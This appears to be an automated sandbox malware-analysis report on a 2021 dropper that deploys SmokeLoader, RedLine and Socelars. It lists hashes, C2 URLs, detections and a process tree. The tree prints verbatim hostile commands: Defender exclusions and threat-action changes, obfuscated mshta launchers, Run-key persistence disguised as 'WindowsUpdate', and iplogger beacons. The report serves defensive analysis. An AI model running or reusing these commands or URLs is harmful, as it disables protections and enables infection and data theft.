Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
34s -
max time network
1806s -
platform
windows7_x64 -
resource
win7-de-20210920 -
submitted
22-09-2021 05:21
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1820 668 rundll32.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6396 668 rundll32.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1352 668 rundll32.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 976 668 rundll32.exe 96 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral3/memory/2100-227-0x0000000000330000-0x0000000000355000-memory.dmp family_redline behavioral3/memory/2924-293-0x000000000041C5E2-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral3/files/0x0005000000013271-96.dat family_socelars behavioral3/files/0x0005000000013271-151.dat family_socelars behavioral3/files/0x0005000000013271-136.dat family_socelars -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
resource yara_rule behavioral3/files/0x00050000000130d5-69.dat aspack_v212_v242 behavioral3/files/0x00050000000130d5-70.dat aspack_v212_v242 behavioral3/files/0x00050000000130ab-72.dat aspack_v212_v242 behavioral3/files/0x00050000000130ab-71.dat aspack_v212_v242 behavioral3/files/0x000500000001318e-75.dat aspack_v212_v242 behavioral3/files/0x000500000001318e-76.dat aspack_v212_v242 -
Blocklisted process makes network request 3 IoCs
flow pid Process 20 1876 powershell.exe 22 1876 powershell.exe 24 1876 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 1772 setup_installer.exe 1760 setup_install.exe 1832 Sun1917b8fb5f09db8.exe 1672 Sun191101c1aaa.exe 1640 Sun1905815e51282417.exe 1844 Sun1908b94df837b3158.exe 1876 Sun19262b9e49ad.exe 1020 Sun193fda712d9f1.exe 1592 Sun195a1614ec24e6a.exe 740 Sun198361825f4.exe 472 Sun1966fb31dd5a07.exe 992 Sun1966fb31dd5a07.tmp 1756 Sun19e4ade31b2a.exe 1576 WMIC.exe -
Loads dropped DLL 41 IoCs
pid Process 1592 setup_x86_x64_install.exe 1772 setup_installer.exe 1772 setup_installer.exe 1772 setup_installer.exe 1772 setup_installer.exe 1772 setup_installer.exe 1772 setup_installer.exe 1760 setup_install.exe 1760 setup_install.exe 1760 setup_install.exe 1760 setup_install.exe 1760 setup_install.exe 1760 setup_install.exe 1760 setup_install.exe 1760 setup_install.exe 1968 cmd.exe 1972 cmd.exe 1972 cmd.exe 1096 cmd.exe 1816 cmd.exe 1684 cmd.exe 1832 Sun1917b8fb5f09db8.exe 1832 Sun1917b8fb5f09db8.exe 996 cmd.exe 1716 cmd.exe 1844 Sun1908b94df837b3158.exe 1844 Sun1908b94df837b3158.exe 2040 cmd.exe 1668 cmd.exe 1592 Sun195a1614ec24e6a.exe 1592 Sun195a1614ec24e6a.exe 472 Sun1966fb31dd5a07.exe 472 Sun1966fb31dd5a07.exe 472 Sun1966fb31dd5a07.exe 992 Sun1966fb31dd5a07.tmp 992 Sun1966fb31dd5a07.tmp 992 Sun1966fb31dd5a07.tmp 1876 Sun19262b9e49ad.exe 1876 Sun19262b9e49ad.exe 616 Process not Found 992 Sun1966fb31dd5a07.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1708 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral3/memory/2216-216-0x0000000000CC0000-0x0000000000CC1000-memory.dmp themida behavioral3/memory/2348-237-0x0000000000FA0000-0x0000000000FA1000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 16 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 61 ipinfo.io 521 ip-api.com 267 ipinfo.io 377 ip-api.com 817 api.2ip.ua 9 ip-api.com 242 api.2ip.ua 250 api.2ip.ua 307 api.2ip.ua 309 ipinfo.io 819 api.2ip.ua 62 ipinfo.io 268 ipinfo.io 311 ipinfo.io 315 api.2ip.ua 510 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
pid pid_target Process procid_target 1816 2248 WerFault.exe 66 3544 2832 WerFault.exe 78 3532 2520 WerFault.exe 72 3312 3868 WerFault.exe 121 4984 1832 WerFault.exe 50 3488 4264 WerFault.exe 172 2684 4556 WerFault.exe 233 7088 5348 WerFault.exe 296 7080 4504 WerFault.exe 159 4324 1752 WerFault.exe 323 6688 976 WerFault.exe 733 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe -
Creates scheduled task(s) 1 TTPs 36 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1560 schtasks.exe 2340 schtasks.exe 1560 schtasks.exe 5600 schtasks.exe 3424 schtasks.exe 6224 schtasks.exe 7148 schtasks.exe 4136 schtasks.exe 4848 schtasks.exe 6156 schtasks.exe 3688 schtasks.exe 6628 schtasks.exe 5284 schtasks.exe 4404 schtasks.exe 7052 schtasks.exe 2804 schtasks.exe 4388 schtasks.exe 5200 schtasks.exe 4668 schtasks.exe 3916 schtasks.exe 1680 schtasks.exe 4800 schtasks.exe 2112 schtasks.exe 5884 schtasks.exe 1320 schtasks.exe 6676 schtasks.exe 4296 schtasks.exe 6800 schtasks.exe 1580 schtasks.exe 4544 schtasks.exe 4508 schtasks.exe 4636 schtasks.exe 5552 schtasks.exe 5188 schtasks.exe 5696 schtasks.exe 4800 schtasks.exe -
Delays execution with timeout.exe 6 IoCs
pid Process 5824 timeout.exe 2648 timeout.exe 3884 timeout.exe 7036 timeout.exe 6476 timeout.exe 816 timeout.exe -
Kills process with taskkill 13 IoCs
pid Process 5656 taskkill.exe 2764 taskkill.exe 4512 taskkill.exe 1892 taskkill.exe 5268 taskkill.exe 3744 taskkill.exe 4896 taskkill.exe 4504 taskkill.exe 3296 taskkill.exe 4144 taskkill.exe 784 taskkill.exe 6436 taskkill.exe 2340 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 1844 Sun1908b94df837b3158.exe 1844 Sun1908b94df837b3158.exe 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found 1228 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1844 Sun1908b94df837b3158.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeCreateTokenPrivilege 1876 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 1876 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 1876 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 1876 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 1876 Sun19262b9e49ad.exe Token: SeTcbPrivilege 1876 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 1876 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 1876 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 1876 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 1876 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 1876 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 1876 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 1876 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 1876 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 1876 Sun19262b9e49ad.exe Token: SeBackupPrivilege 1876 Sun19262b9e49ad.exe Token: SeRestorePrivilege 1876 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 1876 Sun19262b9e49ad.exe Token: SeDebugPrivilege 1876 Sun19262b9e49ad.exe Token: SeAuditPrivilege 1876 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 1876 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 1876 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 1876 Sun19262b9e49ad.exe Token: SeUndockPrivilege 1876 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 1876 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 1876 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 1876 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 1876 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 1876 Sun19262b9e49ad.exe Token: 31 1876 Sun19262b9e49ad.exe Token: 32 1876 Sun19262b9e49ad.exe Token: 33 1876 Sun19262b9e49ad.exe Token: 34 1876 Sun19262b9e49ad.exe Token: 35 1876 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 1228 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1228 Process not Found 1228 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1228 Process not Found 1228 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1592 wrote to memory of 1772 1592 setup_x86_x64_install.exe 28 PID 1592 wrote to memory of 1772 1592 setup_x86_x64_install.exe 28 PID 1592 wrote to memory of 1772 1592 setup_x86_x64_install.exe 28 PID 1592 wrote to memory of 1772 1592 setup_x86_x64_install.exe 28 PID 1592 wrote to memory of 1772 1592 setup_x86_x64_install.exe 28 PID 1592 wrote to memory of 1772 1592 setup_x86_x64_install.exe 28 PID 1592 wrote to memory of 1772 1592 setup_x86_x64_install.exe 28 PID 1772 wrote to memory of 1760 1772 setup_installer.exe 29 PID 1772 wrote to memory of 1760 1772 setup_installer.exe 29 PID 1772 wrote to memory of 1760 1772 setup_installer.exe 29 PID 1772 wrote to memory of 1760 1772 setup_installer.exe 29 PID 1772 wrote to memory of 1760 1772 setup_installer.exe 29 PID 1772 wrote to memory of 1760 1772 setup_installer.exe 29 PID 1772 wrote to memory of 1760 1772 setup_installer.exe 29 PID 1760 wrote to memory of 1944 1760 setup_install.exe 31 PID 1760 wrote to memory of 1944 1760 setup_install.exe 31 PID 1760 wrote to memory of 1944 1760 setup_install.exe 31 PID 1760 wrote to memory of 1944 1760 setup_install.exe 31 PID 1760 wrote to memory of 1944 1760 setup_install.exe 31 PID 1760 wrote to memory of 1944 1760 setup_install.exe 31 PID 1760 wrote to memory of 1944 1760 setup_install.exe 31 PID 1760 wrote to memory of 1968 1760 setup_install.exe 32 PID 1760 wrote to memory of 1968 1760 setup_install.exe 32 PID 1760 wrote to memory of 1968 1760 setup_install.exe 32 PID 1760 wrote to memory of 1968 1760 setup_install.exe 32 PID 1760 wrote to memory of 1968 1760 setup_install.exe 32 PID 1760 wrote to memory of 1968 1760 setup_install.exe 32 PID 1760 wrote to memory of 1968 1760 setup_install.exe 32 PID 1760 wrote to memory of 1816 1760 setup_install.exe 33 PID 1760 wrote to memory of 1816 1760 setup_install.exe 33 PID 1760 wrote to memory of 1816 1760 setup_install.exe 33 PID 1760 wrote to memory of 1816 1760 setup_install.exe 33 PID 1760 wrote to memory of 1816 1760 setup_install.exe 33 PID 1760 wrote to memory of 1816 1760 setup_install.exe 33 PID 1760 wrote to memory of 1816 1760 setup_install.exe 33 PID 1760 wrote to memory of 1716 1760 setup_install.exe 34 PID 1760 wrote to memory of 1716 1760 setup_install.exe 34 PID 1760 wrote to memory of 1716 1760 setup_install.exe 34 PID 1760 wrote to memory of 1716 1760 setup_install.exe 34 PID 1760 wrote to memory of 1716 1760 setup_install.exe 34 PID 1760 wrote to memory of 1716 1760 setup_install.exe 34 PID 1760 wrote to memory of 1716 1760 setup_install.exe 34 PID 1760 wrote to memory of 616 1760 setup_install.exe 35 PID 1760 wrote to memory of 616 1760 setup_install.exe 35 PID 1760 wrote to memory of 616 1760 setup_install.exe 35 PID 1760 wrote to memory of 616 1760 setup_install.exe 35 PID 1760 wrote to memory of 616 1760 setup_install.exe 35 PID 1760 wrote to memory of 616 1760 setup_install.exe 35 PID 1760 wrote to memory of 616 1760 setup_install.exe 35 PID 1760 wrote to memory of 1972 1760 setup_install.exe 36 PID 1760 wrote to memory of 1972 1760 setup_install.exe 36 PID 1760 wrote to memory of 1972 1760 setup_install.exe 36 PID 1760 wrote to memory of 1972 1760 setup_install.exe 36 PID 1760 wrote to memory of 1972 1760 setup_install.exe 36 PID 1760 wrote to memory of 1972 1760 setup_install.exe 36 PID 1760 wrote to memory of 1972 1760 setup_install.exe 36 PID 1760 wrote to memory of 1936 1760 setup_install.exe 37 PID 1760 wrote to memory of 1936 1760 setup_install.exe 37 PID 1760 wrote to memory of 1936 1760 setup_install.exe 37 PID 1760 wrote to memory of 1936 1760 setup_install.exe 37 PID 1760 wrote to memory of 1936 1760 setup_install.exe 37 PID 1760 wrote to memory of 1936 1760 setup_install.exe 37 PID 1760 wrote to memory of 1936 1760 setup_install.exe 37 PID 1760 wrote to memory of 1096 1760 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1944
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Loads dropped DLL
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1832 -
C:\Users\Admin\Documents\SBnGBXQX6Kg3iBSPr1IEnT6q.exe"C:\Users\Admin\Documents\SBnGBXQX6Kg3iBSPr1IEnT6q.exe"6⤵PID:4300
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:4748
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:4144
-
-
-
-
C:\Users\Admin\Documents\GS1cB0TS057JY8DB7U6q9gqV.exe"C:\Users\Admin\Documents\GS1cB0TS057JY8DB7U6q9gqV.exe"6⤵PID:4292
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\Documents\GS1cB0TS057JY8DB7U6q9gqV.exe"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If """" =="""" for %R IN ( ""C:\Users\Admin\Documents\GS1cB0TS057JY8DB7U6q9gqV.exe"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))7⤵PID:4580
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\Documents\GS1cB0TS057JY8DB7U6q9gqV.exe" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "" =="" for %R IN ( "C:\Users\Admin\Documents\GS1cB0TS057JY8DB7U6q9gqV.exe" ) do taskkill -im "%~nXR" /f8⤵PID:4916
-
C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXEY1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh9⤵PID:5480
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If ""/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh "" =="""" for %R IN ( ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))10⤵PID:588
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh " =="" for %R IN ( "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" ) do taskkill -im "%~nXR" /f11⤵PID:3744
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" Z~DYVRL.v,IzgdZv10⤵PID:5824
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "GS1cB0TS057JY8DB7U6q9gqV.exe" /f9⤵
- Kills process with taskkill
PID:6436
-
-
-
-
-
C:\Users\Admin\Documents\SUlmBMgHdtcZGQbfmnGOGSyH.exe"C:\Users\Admin\Documents\SUlmBMgHdtcZGQbfmnGOGSyH.exe"6⤵PID:4284
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\47604871305.exe"7⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\47604871305.exe"C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\47604871305.exe"8⤵PID:5852
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\62437438412.exe" /mix7⤵PID:4840
-
C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\62437438412.exe"C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\62437438412.exe" /mix8⤵PID:5988
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\rqXDWYAuGn & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\62437438412.exe"9⤵PID:1904
-
C:\Windows\SysWOW64\timeout.exetimeout 410⤵
- Delays execution with timeout.exe
PID:3884
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\83071822100.exe" /mix7⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\83071822100.exe"C:\Users\Admin\AppData\Local\Temp\{EUTx-SmsGW-gx5q-CHfJM}\83071822100.exe" /mix8⤵PID:3212
-
C:\Users\Admin\AppData\Roaming\sliders\apinesp.exeapinesp.exe9⤵PID:6552
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "SUlmBMgHdtcZGQbfmnGOGSyH.exe" /f & erase "C:\Users\Admin\Documents\SUlmBMgHdtcZGQbfmnGOGSyH.exe" & exit7⤵PID:5440
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "SUlmBMgHdtcZGQbfmnGOGSyH.exe" /f8⤵
- Kills process with taskkill
PID:4512
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:3656
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:5504
-
-
-
-
-
C:\Users\Admin\Documents\1HlMxTGDTfpA5mSqexd0AGmS.exe"C:\Users\Admin\Documents\1HlMxTGDTfpA5mSqexd0AGmS.exe"6⤵PID:4520
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "Done.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵PID:2264
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵PID:1552
-
-
C:\Users\Admin\AppData\Local\Temp\Done.exe"Done.exe"8⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\863387648.exe"C:\Users\Admin\AppData\Local\Temp\863387648.exe"9⤵PID:6724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsUpdate' -Value '"C:\Users\Admin\AppData\Local\Temp\Folder Name\Win32Update.exe"' -PropertyType 'String'10⤵PID:3060
-
-
-
C:\Users\Admin\AppData\Local\Temp\1937106983.exe"C:\Users\Admin\AppData\Local\Temp\1937106983.exe"9⤵PID:4964
-
C:\Users\Admin\AppData\Local\Temp\1937106983.exe"C:\Users\Admin\AppData\Local\Temp\1937106983.exe"10⤵PID:5032
-
-
C:\Users\Admin\AppData\Local\Temp\1937106983.exe"C:\Users\Admin\AppData\Local\Temp\1937106983.exe"10⤵PID:5132
-
-
C:\Users\Admin\AppData\Local\Temp\1937106983.exe"C:\Users\Admin\AppData\Local\Temp\1937106983.exe"10⤵PID:5012
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"8⤵PID:1708
-
C:\Users\Admin\AppData\Local\Temp\vss.exe"C:\Users\Admin\AppData\Local\Temp\vss.exe"9⤵PID:5456
-
-
C:\Users\Admin\AppData\Local\Temp\sviss.exe"C:\Users\Admin\AppData\Local\Temp\sviss.exe"9⤵PID:5040
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1IAiS9⤵PID:4268
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4268 CREDAT:275457 /prefetch:210⤵PID:5576
-
-
-
-
-
-
C:\Users\Admin\Documents\MHTWRg79YZw59kjSCQtjr6Eh.exe"C:\Users\Admin\Documents\MHTWRg79YZw59kjSCQtjr6Eh.exe"6⤵PID:4640
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:6124
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵PID:5704
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵PID:1224
-
-
-
C:\Users\Admin\Documents\QQF6mkRaOzRXsGfIttivp6QE.exe"C:\Users\Admin\Documents\QQF6mkRaOzRXsGfIttivp6QE.exe"6⤵PID:4632
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\QQF6mkRaOzRXsGfIttivp6QE.exe"7⤵PID:5452
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:2648
-
-
-
-
C:\Users\Admin\Documents\_2rkyBP1rpBHiw9PNWwpeoCo.exe"C:\Users\Admin\Documents\_2rkyBP1rpBHiw9PNWwpeoCo.exe"6⤵PID:4680
-
C:\Users\Admin\Documents\_2rkyBP1rpBHiw9PNWwpeoCo.exe"C:\Users\Admin\Documents\_2rkyBP1rpBHiw9PNWwpeoCo.exe"7⤵PID:4436
-
-
-
C:\Users\Admin\Documents\NIVygSelvAci9NzyU9WIUirP.exe"C:\Users\Admin\Documents\NIVygSelvAci9NzyU9WIUirP.exe"6⤵PID:4496
-
C:\Users\Admin\Documents\NIVygSelvAci9NzyU9WIUirP.exe"C:\Users\Admin\Documents\NIVygSelvAci9NzyU9WIUirP.exe"7⤵PID:556
-
C:\Users\Admin\AppData\Local\Temp\Bandicam.exe"C:\Users\Admin\AppData\Local\Temp\Bandicam.exe"8⤵PID:976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\ProgramData9⤵
- Blocklisted process makes network request
PID:1876
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 976 -s 16089⤵
- Program crash
PID:6688
-
-
-
-
-
